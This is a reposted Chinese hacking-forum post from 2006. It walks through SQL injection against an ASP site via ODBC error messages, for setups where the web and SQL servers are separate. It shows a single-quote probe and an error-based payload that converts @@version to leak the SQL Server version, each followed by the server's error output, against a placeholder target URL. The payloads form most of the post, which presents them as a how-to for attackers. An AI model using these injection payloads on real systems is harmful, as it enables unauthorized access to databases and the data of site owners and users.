[转载]WEB/SQL分离利用ODBC注入

蜀山剑客

晶莹剔透§烈日灼然

Rank: 1

帖子: 59
精华: 2
积分: 219
阅读权限: 40
性别: 男
来自: 蜀
在线时间: 151 小时
注册时间: 2005-2-6
最后登录: 2008-6-1

发短消息
加为好友
当前离线

楼主大中小发表于 2006-3-29 16:16 只看该作者

[转载]WEB/SQL分离利用ODBC注入

信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一直来很多牛人说可以web/sql分离的情况下，利用odbc来拿本机权限，不过这篇文章好象是连回本地来做测试。不过总算是一个突破
EXAMPLE TO USE:
http://www.xxxx.com/FullStory.asp?id=1

Exploiting the hole:
http://www.xxxx.com/FullStory.asp?id=1’

Code:

Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’
[Microsoft][ODBCSQLServerDriver] [SQLServer]
Unclosed quotation mark before the character string ’’.
/Including/general.asp, line 840\

VERSION
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Code:

[SQL Server]Syntax error converting the nvarchar value ’Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright

My Blog http://www.ssjk.org